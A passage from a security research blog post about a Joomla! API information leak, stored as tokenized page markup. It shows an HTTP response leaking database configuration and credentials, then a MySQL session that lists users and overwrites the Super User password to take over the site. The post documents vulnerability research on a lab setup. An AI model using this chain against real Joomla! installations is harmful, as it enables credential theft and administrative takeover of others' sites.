same-origin\n",[1373,104043,104044,104046],{"class":1375,"line":4877},[1373,104045,11852],{"class":1397},[1373,104047,104048],{"class":4640}," X-Powered-By: JoomlaAPI\u002F1.0\n",[1373,104050,104051,104053],{"class":1375,"line":4915},[1373,104052,11852],{"class":1397},[1373,104054,104055],{"class":4640}," Expires: Wed, 17 Aug 2005 00:00:00 GMT\n",[1373,104057,104058,104060],{"class":1375,"line":4931},[1373,104059,11852],{"class":1397},[1373,104061,104062],{"class":4640}," Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT\n",[1373,104064,104065,104067,104070,104072,104075,104078,104080],{"class":1375,"line":4947},[1373,104066,11852],{"class":1397},[1373,104068,104069],{"class":4640}," Cache-Control: no-store, no-cache, must-revalidate, post-check",[1373,104071,5417],{"class":1397},[1373,104073,104074],{"class":1391},"0,",[1373,104076,104077],{"class":4640}," pre-check",[1373,104079,5417],{"class":1397},[1373,104081,104082],{"class":1391},"0\n",[1373,104084,104085,104087],{"class":1375,"line":4952},[1373,104086,11852],{"class":1397},[1373,104088,104089],{"class":4640}," Pragma: no-cache\n",[1373,104091,104092,104094],{"class":1375,"line":6776},[1373,104093,11852],{"class":1397},[1373,104095,104096],{"class":4640}," Content-Length: 1983\n",[1373,104098,104099,104101,104104,104106,104108,104110],{"class":1375,"line":6781},[1373,104100,11852],{"class":1397},[1373,104102,104103],{"class":4640}," Content-Type: application\u002Fvnd.api+json",[1373,104105,39663],{"class":1383},[1373,104107,48986],{"class":4640},[1373,104109,5417],{"class":1397},[1373,104111,104112],{"class":1391},"utf-8\n",[1373,104114,104115],{"class":1375,"line":7524},[1373,104116,35662],{"class":1397},[1373,104118,104119,104121,104124,104126,104128,104130,104132,104135,104138,104140,104142,104145,104147,104149,104151,104153,104155,104157,104160,104163,104165,104168,104170,104172,104175,104177,104179,104181,104183,104185,104187,104190,104192,104194,104196,104199,104201,104204,104206,104208,104211,104213,104215,104217,104220,104222,104225,104228,104231,104234,104236,104239,104241,104243,104245,104247,104249,104251,104253,104255,104257,104259,104262,104264,104267,104270,104272,104274,104276,104279,104281,104283,104285,104287,104290,104292,104295,104298,104301,104303,104305,104307,104309,104311,104314,104316,104318,104320,104322,104324,104326,104328,104330,104332,104334,104336,104338,104340,104342,104344,104346,104348,104350,104352,104354,104356,104359,104361,104364,104366,104368,104370,104372,104374,104376,104378,104380,104382,104384,104386,104388,104390,104392,104394,104396,104398,104400,104402,104404,104406,104408,104410,104412,104414,104417,104419,104421,104423,104425,104427,104429,104431,104433,104435,104437,104439,104441,104443,104445,104447,104449,104451,104453,104455,104457,104459,104461,104463,104465,104467,104469,104471,104473,104475,104478,104480,104482,104484,104486,104488,104490,104492,104494,104496,104498,104500,104502,104504,104506,104508,104510,104512,104514,104516,104518,104520,104522,104524,104526,104528,104530,104532,104534,104536,104538,104540,104543,104545,104547,104549,104552,104554,104556,104558,104560,104562,104564,104566,104568,104570,104572,104574,104576,104578,104580,104582,104584,104586,104588,104590,104592,104594,104596,104598,104600,104602,104604,104606,104609,104611,104613,104615,104617,104619,104621,104623,104625,104627,104629,104631,104633,104635,104637,104639,104641,104643,104645,104647,104649,104651,104653,104655,104657,104659,104661,104663,104665,104667,104669,104671,104674,104676,104679,104681,104683,104685,104688],{"class":1375,"line":7530},[1373,104120,9149],{"class":1383},[1373,104122,104123],{"class":2206},"\"links\"",[1373,104125,4606],{"class":1379},[1373,104127,9149],{"class":1391},[1373,104129,183],{"class":4640},[1373,104131,76212],{"class":2206},[1373,104133,104134],{"class":2206},"\":\"",[1373,104136,104137],{"class":2206},"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public",[1373,104139,5417],{"class":1391},[1373,104141,10874],{"class":1379},[1373,104143,104144],{"class":2206},"\",\"",[1373,104146,25220],{"class":2206},[1373,104148,104134],{"class":2206},[1373,104150,104137],{"class":2206},[1373,104152,5417],{"class":1391},[1373,104154,10874],{"class":1379},[1373,104156,7218],{"class":1383},[1373,104158,104159],{"class":2206},"page%5Boffset%5D",[1373,104161,104162],{"class":1391},"=20",[1373,104164,7218],{"class":1383},[1373,104166,104167],{"class":2206},"page%5Blimit%5D",[1373,104169,104162],{"class":1391},[1373,104171,104144],{"class":2206},[1373,104173,104174],{"class":2206},"last",[1373,104176,104134],{"class":2206},[1373,104178,104137],{"class":2206},[1373,104180,5417],{"class":1391},[1373,104182,10874],{"class":1379},[1373,104184,7218],{"class":1383},[1373,104186,104159],{"class":2206},[1373,104188,104189],{"class":1391},"=60",[1373,104191,7218],{"class":1383},[1373,104193,104167],{"class":2206},[1373,104195,104162],{"class":1391},[1373,104197,104198],{"class":2206},"\"},\"",[1373,104200,9156],{"class":2206},[1373,104202,104203],{"class":2206},"\":[{\"",[1373,104205,26399],{"class":1379},[1373,104207,104134],{"class":2206},[1373,104209,104210],{"class":2206},"application",[1373,104212,104144],{"class":2206},[1373,104214,26412],{"class":2206},[1373,104216,104134],{"class":2206},[1373,104218,104219],{"class":2206},"224",[1373,104221,104144],{"class":2206},[1373,104223,104224],{"class":2206},"attributes",[1373,104226,104227],{"class":2206},"\":{\"",[1373,104229,104230],{"class":2206},"offline",[1373,104232,104233],{"class":2206},"\":false,\"",[1373,104235,26412],{"class":2206},[1373,104237,104238],{"class":2206},"\":224}},{\"",[1373,104240,26399],{"class":1379},[1373,104242,104134],{"class":2206},[1373,104244,104210],{"class":2206},[1373,104246,104144],{"class":2206},[1373,104248,26412],{"class":2206},[1373,104250,104134],{"class":2206},[1373,104252,104219],{"class":2206},[1373,104254,104144],{"class":2206},[1373,104256,104224],{"class":2206},[1373,104258,104227],{"class":2206},[1373,104260,104261],{"class":2206},"offline_message",[1373,104263,104134],{"class":2206},[1373,104265,104266],{"class":2206},"This",[1373,104268,104269],{"class":1391}," site",[1373,104271,55517],{"class":1391},[1373,104273,79274],{"class":1391},[1373,104275,55807],{"class":1391},[1373,104277,104278],{"class":1391}," maintenance.",[1373,104280,11852],{"class":1397},[1373,104282,74424],{"class":1391},[1373,104284,11872],{"class":4640},[1373,104286,5384],{"class":1397},[1373,104288,104289],{"class":1391},"Please",[1373,104291,98463],{"class":1391},[1373,104293,104294],{"class":1391}," back",[1373,104296,104297],{"class":1391}," again",[1373,104299,104300],{"class":1391}," soon.",[1373,104302,183],{"class":1387},[1373,104304,5437],{"class":1391},[1373,104306,183],{"class":1387},[1373,104308,26412],{"class":1391},[1373,104310,183],{"class":1387},[1373,104312,104313],{"class":1391},":224}},{",[1373,104315,183],{"class":1387},[1373,104317,26399],{"class":1391},[1373,104319,183],{"class":1387},[1373,104321,4606],{"class":1391},[1373,104323,183],{"class":1387},[1373,104325,104210],{"class":1391},[1373,104327,183],{"class":1387},[1373,104329,5437],{"class":1391},[1373,104331,183],{"class":1387},[1373,104333,26412],{"class":1391},[1373,104335,183],{"class":1387},[1373,104337,4606],{"class":1391},[1373,104339,183],{"class":1387},[1373,104341,104219],{"class":1391},[1373,104343,183],{"class":1387},[1373,104345,5437],{"class":1391},[1373,104347,183],{"class":1387},[1373,104349,104224],{"class":1391},[1373,104351,183],{"class":1387},[1373,104353,8304],{"class":1391},[1373,104355,183],{"class":1387},[1373,104357,104358],{"class":1391},"display_offline_message",[1373,104360,183],{"class":1387},[1373,104362,104363],{"class":1391},":1,",[1373,104365,183],{"class":1387},[1373,104367,26412],{"class":1391},[1373,104369,183],{"class":1387},[1373,104371,104313],{"class":1391},[1373,104373,183],{"class":1387},[1373,104375,26399],{"class":1391},[1373,104377,183],{"class":1387},[1373,104379,4606],{"class":1391},[1373,104381,183],{"class":1387},[1373,104383,104210],{"class":1391},[1373,104385,183],{"class":1387},[1373,104387,5437],{"class":1391},[1373,104389,183],{"class":1387},[1373,104391,26412],{"class":1391},[1373,104393,183],{"class":1387},[1373,104395,4606],{"class":1391},[1373,104397,183],{"class":1387},[1373,104399,104219],{"class":1391},[1373,104401,183],{"class":1387},[1373,104403,5437],{"class":1391},[1373,104405,183],{"class":1387},[1373,104407,104224],{"class":1391},[1373,104409,183],{"class":1387},[1373,104411,8304],{"class":1391},[1373,104413,183],{"class":1387},[1373,104415,104416],{"class":1391},"offline_image",[1373,104418,183],{"class":1387},[1373,104420,4606],{"class":1391},[1373,104422,7083],{"class":1387},[1373,104424,5437],{"class":1391},[1373,104426,183],{"class":1387},[1373,104428,26412],{"class":1391},[1373,104430,183],{"class":1387},[1373,104432,104313],{"class":1391},[1373,104434,183],{"class":1387},[1373,104436,26399],{"class":1391},[1373,104438,183],{"class":1387},[1373,104440,4606],{"class":1391},[1373,104442,183],{"class":1387},[1373,104444,104210],{"class":1391},[1373,104446,183],{"class":1387},[1373,104448,5437],{"class":1391},[1373,104450,183],{"class":1387},[1373,104452,26412],{"class":1391},[1373,104454,183],{"class":1387},[1373,104456,4606],{"class":1391},[1373,104458,183],{"class":1387},[1373,104460,104219],{"class":1391},[1373,104462,183],{"class":1387},[1373,104464,5437],{"class":1391},[1373,104466,183],{"class":1387},[1373,104468,104224],{"class":1391},[1373,104470,183],{"class":1387},[1373,104472,8304],{"class":1391},[1373,104474,183],{"class":1387},[1373,104476,104477],{"class":1391},"sitename",[1373,104479,183],{"class":1387},[1373,104481,4606],{"class":1391},[1373,104483,183],{"class":1387},[1373,104485,19383],{"class":1391},[1373,104487,183],{"class":1387},[1373,104489,5437],{"class":1391},[1373,104491,183],{"class":1387},[1373,104493,26412],{"class":1391},[1373,104495,183],{"class":1387},[1373,104497,104313],{"class":1391},[1373,104499,183],{"class":1387},[1373,104501,26399],{"class":1391},[1373,104503,183],{"class":1387},[1373,104505,4606],{"class":1391},[1373,104507,183],{"class":1387},[1373,104509,104210],{"class":1391},[1373,104511,183],{"class":1387},[1373,104513,5437],{"class":1391},[1373,104515,183],{"class":1387},[1373,104517,26412],{"class":1391},[1373,104519,183],{"class":1387},[1373,104521,4606],{"class":1391},[1373,104523,183],{"class":1387},[1373,104525,104219],{"class":1391},[1373,104527,183],{"class":1387},[1373,104529,5437],{"class":1391},[1373,104531,183],{"class":1387},[1373,104533,104224],{"class":1391},[1373,104535,183],{"class":1387},[1373,104537,8304],{"class":1391},[1373,104539,183],{"class":1387},[1373,104541,104542],{"class":1391},"editor",[1373,104544,183],{"class":1387},[1373,104546,4606],{"class":1391},[1373,104548,183],{"class":1387},[1373,104550,104551],{"class":1391},"tinymce",[1373,104553,183],{"class":1387},[1373,104555,5437],{"class":1391},[1373,104557,183],{"class":1387},[1373,104559,26412],{"class":1391},[1373,104561,183],{"class":1387},[1373,104563,104313],{"class":1391},[1373,104565,183],{"class":1387},[1373,104567,26399],{"class":1391},[1373,104569,183],{"class":1387},[1373,104571,4606],{"class":1391},[1373,104573,183],{"class":1387},[1373,104575,104210],{"class":1391},[1373,104577,183],{"class":1387},[1373,104579,5437],{"class":1391},[1373,104581,183],{"class":1387},[1373,104583,26412],{"class":1391},[1373,104585,183],{"class":1387},[1373,104587,4606],{"class":1391},[1373,104589,183],{"class":1387},[1373,104591,104219],{"class":1391},[1373,104593,183],{"class":1387},[1373,104595,5437],{"class":1391},[1373,104597,183],{"class":1387},[1373,104599,104224],{"class":1391},[1373,104601,183],{"class":1387},[1373,104603,8304],{"class":1391},[1373,104605,183],{"class":1387},[1373,104607,104608],{"class":1391},"captcha",[1373,104610,183],{"class":1387},[1373,104612,4606],{"class":1391},[1373,104614,183],{"class":1387},[1373,104616,445],{"class":1391},[1373,104618,183],{"class":1387},[1373,104620,5437],{"class":1391},[1373,104622,183],{"class":1387},[1373,104624,26412],{"class":1391},[1373,104626,183],{"class":1387},[1373,104628,104313],{"class":1391},[1373,104630,183],{"class":1387},[1373,104632,26399],{"class":1391},[1373,104634,183],{"class":1387},[1373,104636,4606],{"class":1391},[1373,104638,183],{"class":1387},[1373,104640,104210],{"class":1391},[1373,104642,183],{"class":1387},[1373,104644,5437],{"class":1391},[1373,104646,183],{"class":1387},[1373,104648,26412],{"class":1391},[1373,104650,183],{"class":1387},[1373,104652,4606],{"class":1391},[1373,104654,183],{"class":1387},[1373,104656,104219],{"class":1391},[1373,104658,183],{"class":1387},[1373,104660,5437],{"class":1391},[1373,104662,183],{"class":1387},[1373,104664,104224],{"class":1391},[1373,104666,183],{"class":1387},[1373,104668,8304],{"class":1391},[1373,104670,183],{"class":1387},[1373,104672,104673],{"class":1391},"list_limit",[1373,104675,183],{"class":1387},[1373,104677,104678],{"class":1391},":20,",[1373,104680,183],{"class":1387},[1373,104682,49188],{"class":1391},[1373,104684,35613],{"class":6761},[1373,104686,104687],{"class":1391}," Connection",[1373,104689,104690],{"class":4630}," #0 to host 10.9.49.205 left intact\n",[1373,104692,104693,104695,104697,104699,104701,104703,104705,104707,104709,104711,104713,104715,104717,104720,104723,104725,104727,104729,104731,104733,104735,104737,104739,104741,104743,104745,104747,104750,104752,104754,104756,104758,104760,104762,104764,104766,104768,104770,104772,104774,104776,104779,104781,104783,104785,104787,104789,104791,104793,104795,104797,104799,104801,104803,104805,104808,104811,104813,104815,104817,104819,104821,104823,104825,104827,104829,104831,104833,104835,104838,104840,104843,104845,104847,104849,104851,104853,104855,104857,104859,104861,104863,104865,104867,104869,104871,104873,104875,104877,104879,104881,104883,104885,104887,104889,104891,104893,104895,104897,104899,104901,104903,104905,104907,104909,104911,104913,104915,104917,104919,104921,104923,104925,104927,104929,104931,104933,104935,104937,104939,104941,104943,104945,104947,104949,104951,104953,104955,104957,104959,104961,104963,104965,104967,104969,104972,104974,104976,104978,104980,104982,104984,104986,104988,104990,104992,104994,104996,104998,105001,105003,105006,105008,105010,105012,105014,105016,105018,105020,105022,105024,105026,105028,105030,105032,105035,105038,105040,105042,105044,105046,105048,105050,105052,105054,105056,105058,105060,105062,105065,105067,105069,105072,105074,105076,105079],{"class":1375,"line":7546},[1373,104694,39681],{"class":2206},[1373,104696,104238],{"class":2206},[1373,104698,26399],{"class":1379},[1373,104700,104134],{"class":2206},[1373,104702,104210],{"class":2206},[1373,104704,104144],{"class":2206},[1373,104706,26412],{"class":2206},[1373,104708,104134],{"class":2206},[1373,104710,104219],{"class":2206},[1373,104712,104144],{"class":2206},[1373,104714,104224],{"class":2206},[1373,104716,104227],{"class":2206},[1373,104718,104719],{"class":2206},"access",[1373,104721,104722],{"class":2206},"\":1,\"",[1373,104724,26412],{"class":2206},[1373,104726,104238],{"class":2206},[1373,104728,26399],{"class":1379},[1373,104730,104134],{"class":2206},[1373,104732,104210],{"class":2206},[1373,104734,104144],{"class":2206},[1373,104736,26412],{"class":2206},[1373,104738,104134],{"class":2206},[1373,104740,104219],{"class":2206},[1373,104742,104144],{"class":2206},[1373,104744,104224],{"class":2206},[1373,104746,104227],{"class":2206},[1373,104748,104749],{"class":2206},"debug",[1373,104751,104233],{"class":2206},[1373,104753,26412],{"class":2206},[1373,104755,104238],{"class":2206},[1373,104757,26399],{"class":1379},[1373,104759,104134],{"class":2206},[1373,104761,104210],{"class":2206},[1373,104763,104144],{"class":2206},[1373,104765,26412],{"class":2206},[1373,104767,104134],{"class":2206},[1373,104769,104219],{"class":2206},[1373,104771,104144],{"class":2206},[1373,104773,104224],{"class":2206},[1373,104775,104227],{"class":2206},[1373,104777,104778],{"class":2206},"debug_lang",[1373,104780,104233],{"class":2206},[1373,104782,26412],{"class":2206},[1373,104784,104238],{"class":2206},[1373,104786,26399],{"class":1379},[1373,104788,104134],{"class":2206},[1373,104790,104210],{"class":2206},[1373,104792,104144],{"class":2206},[1373,104794,26412],{"class":2206},[1373,104796,104134],{"class":2206},[1373,104798,104219],{"class":2206},[1373,104800,104144],{"class":2206},[1373,104802,104224],{"class":2206},[1373,104804,104227],{"class":2206},[1373,104806,104807],{"class":2206},"debug_lang_const",[1373,104809,104810],{"class":2206},"\":true,\"",[1373,104812,26412],{"class":2206},[1373,104814,104238],{"class":2206},[1373,104816,26399],{"class":1379},[1373,104818,104134],{"class":2206},[1373,104820,104210],{"class":2206},[1373,104822,104144],{"class":2206},[1373,104824,26412],{"class":2206},[1373,104826,104134],{"class":2206},[1373,104828,104219],{"class":2206},[1373,104830,104144],{"class":2206},[1373,104832,104224],{"class":2206},[1373,104834,104227],{"class":2206},[1373,104836,104837],{"class":2206},"dbtype",[1373,104839,104134],{"class":2206},[1373,104841,104842],{"class":2206},"mysqli",[1373,104844,104144],{"class":2206},[1373,104846,26412],{"class":2206},[1373,104848,104238],{"class":2206},[1373,104850,26399],{"class":1379},[1373,104852,104134],{"class":2206},[1373,104854,104210],{"class":2206},[1373,104856,104144],{"class":2206},[1373,104858,26412],{"class":2206},[1373,104860,104134],{"class":2206},[1373,104862,104219],{"class":2206},[1373,104864,104144],{"class":2206},[1373,104866,104224],{"class":2206},[1373,104868,104227],{"class":2206},[1373,104870,63614],{"class":2206},[1373,104872,104134],{"class":2206},[1373,104874,20240],{"class":2206},[1373,104876,104144],{"class":2206},[1373,104878,26412],{"class":2206},[1373,104880,104238],{"class":2206},[1373,104882,26399],{"class":1379},[1373,104884,104134],{"class":2206},[1373,104886,104210],{"class":2206},[1373,104888,104144],{"class":2206},[1373,104890,26412],{"class":2206},[1373,104892,104134],{"class":2206},[1373,104894,104219],{"class":2206},[1373,104896,104144],{"class":2206},[1373,104898,104224],{"class":2206},[1373,104900,104227],{"class":2206},[1373,104902,39933],{"class":2206},[1373,104904,104134],{"class":2206},[1373,104906,48771],{"class":2206},[1373,104908,104144],{"class":2206},[1373,104910,26412],{"class":2206},[1373,104912,104238],{"class":2206},[1373,104914,26399],{"class":1379},[1373,104916,104134],{"class":2206},[1373,104918,104210],{"class":2206},[1373,104920,104144],{"class":2206},[1373,104922,26412],{"class":2206},[1373,104924,104134],{"class":2206},[1373,104926,104219],{"class":2206},[1373,104928,104144],{"class":2206},[1373,104930,104224],{"class":2206},[1373,104932,104227],{"class":2206},[1373,104934,86310],{"class":2206},[1373,104936,104134],{"class":2206},[1373,104938,89173],{"class":2206},[1373,104940,104144],{"class":2206},[1373,104942,26412],{"class":2206},[1373,104944,104238],{"class":2206},[1373,104946,26399],{"class":1379},[1373,104948,104134],{"class":2206},[1373,104950,104210],{"class":2206},[1373,104952,104144],{"class":2206},[1373,104954,26412],{"class":2206},[1373,104956,104134],{"class":2206},[1373,104958,104219],{"class":2206},[1373,104960,104144],{"class":2206},[1373,104962,104224],{"class":2206},[1373,104964,104227],{"class":2206},[1373,104966,51338],{"class":2206},[1373,104968,104134],{"class":2206},[1373,104970,104971],{"class":2206},"joomla_db",[1373,104973,104144],{"class":2206},[1373,104975,26412],{"class":2206},[1373,104977,104238],{"class":2206},[1373,104979,26399],{"class":1379},[1373,104981,104134],{"class":2206},[1373,104983,104210],{"class":2206},[1373,104985,104144],{"class":2206},[1373,104987,26412],{"class":2206},[1373,104989,104134],{"class":2206},[1373,104991,104219],{"class":2206},[1373,104993,104144],{"class":2206},[1373,104995,104224],{"class":2206},[1373,104997,104227],{"class":2206},[1373,104999,105000],{"class":2206},"dbprefix",[1373,105002,104134],{"class":2206},[1373,105004,105005],{"class":2206},"xj3n0_",[1373,105007,104144],{"class":2206},[1373,105009,26412],{"class":2206},[1373,105011,104238],{"class":2206},[1373,105013,26399],{"class":1379},[1373,105015,104134],{"class":2206},[1373,105017,104210],{"class":2206},[1373,105019,104144],{"class":2206},[1373,105021,26412],{"class":2206},[1373,105023,104134],{"class":2206},[1373,105025,104219],{"class":2206},[1373,105027,104144],{"class":2206},[1373,105029,104224],{"class":2206},[1373,105031,104227],{"class":2206},[1373,105033,105034],{"class":2206},"dbencryption",[1373,105036,105037],{"class":2206},"\":0,\"",[1373,105039,26412],{"class":2206},[1373,105041,104238],{"class":2206},[1373,105043,26399],{"class":1379},[1373,105045,104134],{"class":2206},[1373,105047,104210],{"class":2206},[1373,105049,104144],{"class":2206},[1373,105051,26412],{"class":2206},[1373,105053,104134],{"class":2206},[1373,105055,104219],{"class":2206},[1373,105057,104144],{"class":2206},[1373,105059,104224],{"class":2206},[1373,105061,104227],{"class":2206},[1373,105063,105064],{"class":2206},"dbsslverifyservercert",[1373,105066,104233],{"class":2206},[1373,105068,26412],{"class":2206},[1373,105070,105071],{"class":2206},"\":224}}],\"",[1373,105073,48983],{"class":2206},[1373,105075,104227],{"class":2206},[1373,105077,105078],{"class":2206},"total-pages",[1373,105080,105081],{"class":2206},"\":4}}\n",[18,105083,105084,105085,105088,105089,105091],{},"In the proof of concept above, the server responds with the credentials ",[886,105086,105087],{},"root:labpass1",", which are the credentials for our test Joomla! MySQL account. But it’s important to know that our test MySQL server was bound to ",[886,105090,48753],{},", so the remote attacker can’t access the server, making the credentials mostly useless. Binding MySQL to the localhost should be the most common configuration, which severely limits this credential leak.",[18,105093,105094,105095,105098,105099,105101],{},"However, it appears there are a good number of internet-facing Joomla! installations that use a MySQL server that ",[1131,105096,105097],{},"isn’t"," bound to ",[886,105100,48753],{},". Censys shows thousands of Joomla! Servers colocated with an exposed MySQL server.",[18,105103,105104],{},[68,105105],{":width":10862,"alt":105106,"src":105107},"Censys query with both MySQL and Joomla","\u002Fblog\u002Fjoomla-for-rce\u002Fcensys-joomla-mysql.png",[18,105109,105110,105111,105116],{},"An attacker with credentials to the MySQL server won’t automatically be able to execute arbitrary code. Old MySQL ",[47,105112,105115],{"href":105113,"rel":105114},"https:\u002F\u002Fsqlwiki.netspi.com\u002FattackQueries\u002FreadingAndWritingFiles\u002F#mysql",[51],"attack techniques"," that manipulate local files should be unusable on any modern and\u002For decently configured server. But access to the MySQL server should still provide a path to code execution.",[18,105118,105119,105120,105125],{},"Access to the database allows the attacker to change the Joomla! Super User’s password. Joomla! even ",[47,105121,105124],{"href":105122,"rel":105123},"https:\u002F\u002Fdocs.joomla.org\u002FHow_do_you_recover_or_reset_your_admin_password%3F#Change_the_Password_in_the_Database",[51],"documents"," how this can be done using only database access. The following demonstrates the password change to “secret” using the MySQL client.",[1354,105127,105129],{"className":31740,"code":105128,"language":2186,"meta":219,"style":219},"mysql> use joomla_db;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+-------------------------------+\n| Tables_in_joomla_db |\n+-------------------------------+\n| xj3n0_action_log_config |\n| xj3n0_action_logs \n… truncated …\nmysql> select * from xj3n0_users;\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n| 552 | jake | albinolobster | albinolobster@vulncheck.com | $2y$10$GL9tEHKez5Wa6sr2CjXXmetAr6cOOo7DpE9j1KaeJCIy1UwnaYUVO | 0 | 1 | 2023-03-17 15:07:45 | 2023-03-17 16:41:04 | 0 | | NULL | 0 | | | 0 | |\n+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n1 row in set (0.00 sec)\n\nmysql> Update xj3n0_users SET password = \"d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199\" WHERE id=552;\nQuery OK, 1 row affected (0.00 sec)\nRows matched: 1 Changed: 1 Warnings: 0\n\nmysql>\n",[886,105130,105131,105144,105171,105207,105211,105219,105233,105238,105248,105252,105262,105271,105282,105299,105304,105392,105396,105481,105485,105505,105509,105543,105564,105584,105588],{"__ignoreMap":219},[1373,105132,105133,105135,105137,105139,105142],{"class":1375,"line":1376},[1373,105134,48715],{"class":2206},[1373,105136,69588],{"class":4640},[1373,105138,4976],{"class":1391},[1373,105140,105141],{"class":1391}," joomla_db",[1373,105143,4912],{"class":1383},[1373,105145,105146,105149,105151,105154,105156,105159,105161,105163,105165,105168],{"class":1375,"line":220},[1373,105147,105148],{"class":2206},"Reading",[1373,105150,88158],{"class":1391},[1373,105152,105153],{"class":1391}," information",[1373,105155,55807],{"class":1391},[1373,105157,105158],{"class":1391}," completion",[1373,105160,55815],{"class":1391},[1373,105162,88158],{"class":1391},[1373,105164,67041],{"class":1391},[1373,105166,105167],{"class":1391}," column",[1373,105169,105170],{"class":1391}," names\n",[1373,105172,105173,105176,105178,105181,105184,105186,105189,105191,105194,105196,105199,105202,105204],{"class":1375,"line":1266},[1373,105174,105175],{"class":2206},"You",[1373,105177,39106],{"class":1391},[1373,105179,105180],{"class":1391}," turn",[1373,105182,105183],{"class":1391}," off",[1373,105185,69476],{"class":1391},[1373,105187,105188],{"class":1391}," feature",[1373,105190,55503],{"class":1391},[1373,105192,105193],{"class":1391}," get",[1373,105195,52105],{"class":1391},[1373,105197,105198],{"class":1391}," quicker",[1373,105200,105201],{"class":1391}," startup",[1373,105203,57424],{"class":1391},[1373,105205,105206],{"class":2209}," -A\n",[1373,105208,105209],{"class":1375,"line":1852},[1373,105210,6520],{"emptyLinePlaceholder":237},[1373,105212,105213,105216],{"class":1375,"line":4692},[1373,105214,105215],{"class":2206},"Database",[1373,105217,105218],{"class":1391}," changed\n",[1373,105220,105221,105223,105225,105228,105231],{"class":1375,"line":4724},[1373,105222,48715],{"class":2206},[1373,105224,69588],{"class":4640},[1373,105226,105227],{"class":1391},"show",[1373,105229,105230],{"class":1391}," tables",[1373,105232,4912],{"class":1383},[1373,105234,105235],{"class":1375,"line":4756},[1373,105236,105237],{"class":2206},"+-------------------------------+\n",[1373,105239,105240,105242,105245],{"class":1375,"line":4768},[1373,105241,17472],{"class":1397},[1373,105243,105244],{"class":2206}," Tables_in_joomla_db",[1373,105246,105247],{"class":1397}," |\n",[1373,105249,105250],{"class":1375,"line":4792},[1373,105251,105237],{"class":2206},[1373,105253,105254,105256,105259],{"class":1375,"line":4798},[1373,105255,17472],{"class":1397},[1373,105257,105258],{"class":2206}," xj3n0_action_log_config",[1373,105260,105261],{"class":1397}," |\n",[1373,105263,105264,105266,105269],{"class":1375,"line":4806},[1373,105265,17472],{"class":1397},[1373,105267,105268],{"class":2206}," xj3n0_action_logs",[1373,105270,47154],{"class":4640},[1373,105272,105273,105276,105279],{"class":1375,"line":4817},[1373,105274,105275],{"class":2206},"…",[1373,105277,105278],{"class":1391}," truncated",[1373,105280,105281],{"class":1391}," …\n",[1373,105283,105284,105286,105288,105290,105292,105294,105297],{"class":1375,"line":4825},[1373,105285,48715],{"class":2206},[1373,105287,69588],{"class":4640},[1373,105289,49878],{"class":1391},[1373,105291,19113],{"class":6761},[1373,105293,67067],{"class":1391},[1373,105295,105296],{"class":1391}," xj3n0_users",[1373,105298,4912],{"class":1383},[1373,105300,105301],{"class":1375,"line":4835},[1373,105302,105303],{"class":2206},"+-----+------+---------------+-----------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------+------------+--------+------+--------------+--------------+\n",[1373,105305,105306,105308,105310,105312,105314,105316,105318,105321,105324,105327,105329,105332,105335,105337,105340,105342,105345,105348,105351,105353,105356,105358,105360,105362,105365,105367,105370,105372,105375,105377,105380,105382,105385,105387,105390],{"class":1375,"line":4843},[1373,105307,17472],{"class":1397},[1373,105309,7911],{"class":2206},[1373,105311,79154],{"class":1397},[1373,105313,46496],{"class":2206},[1373,105315,2233],{"class":1397},[1373,105317,90283],{"class":2206},[1373,105319,105320],{"class":1397}," |",[1373,105322,105323],{"class":2206}," email",[1373,105325,105326],{"class":1397}," |",[1373,105328,90288],{"class":2206},[1373,105330,105331],{"class":1397}," |",[1373,105333,105334],{"class":2206}," block",[1373,105336,2233],{"class":1397},[1373,105338,105339],{"class":2206}," sendEmail",[1373,105341,2233],{"class":1397},[1373,105343,105344],{"class":2206}," registerDate",[1373,105346,105347],{"class":1397}," |",[1373,105349,105350],{"class":2206}," lastvisitDate",[1373,105352,105320],{"class":1397},[1373,105354,105355],{"class":2206}," activation",[1373,105357,2233],{"class":1397},[1373,105359,20901],{"class":2206},[1373,105361,2233],{"class":1397},[1373,105363,105364],{"class":2206}," lastResetTime",[1373,105366,2233],{"class":1397},[1373,105368,105369],{"class":2206}," resetCount",[1373,105371,2233],{"class":1397},[1373,105373,105374],{"class":2206}," otpKey",[1373,105376,2233],{"class":1397},[1373,105378,105379],{"class":2206}," otep",[1373,105381,2233],{"class":1397},[1373,105383,105384],{"class":2206}," requireReset",[1373,105386,2233],{"class":1397},[1373,105388,105389],{"class":2206}," authProvider",[1373,105391,61075],{"class":1397},[1373,105393,105394],{"class":1375,"line":4849},[1373,105395,105303],{"class":2206},[1373,105397,105398,105400,105403,105405,105408,105410,105413,105415,105418,105420,105423,105425,105428,105430,105433,105435,105438,105441,105443,105445,105448,105450,105452,105455,105457,105460,105463,105466,105468,105470,105473,105476,105478],{"class":1375,"line":4877},[1373,105399,17472],{"class":1397},[1373,105401,105402],{"class":2206}," 552",[1373,105404,2233],{"class":1397},[1373,105406,105407],{"class":2206}," jake",[1373,105409,2233],{"class":1397},[1373,105411,105412],{"class":2206}," albinolobster",[1373,105414,2233],{"class":1397},[1373,105416,105417],{"class":2206}," albinolobster@vulncheck.com",[1373,105419,2233],{"class":1397},[1373,105421,105422],{"class":4640}," $2y$10$GL9tEHKez5Wa6sr2CjXXmetAr6cOOo7DpE9j1KaeJCIy1UwnaYUVO ",[1373,105424,17472],{"class":1397},[1373,105426,105427],{"class":2206}," 0",[1373,105429,2233],{"class":1397},[1373,105431,105432],{"class":2206}," 1",[1373,105434,2233],{"class":1397},[1373,105436,105437],{"class":2206}," 2023-03-17",[1373,105439,105440],{"class":1391}," 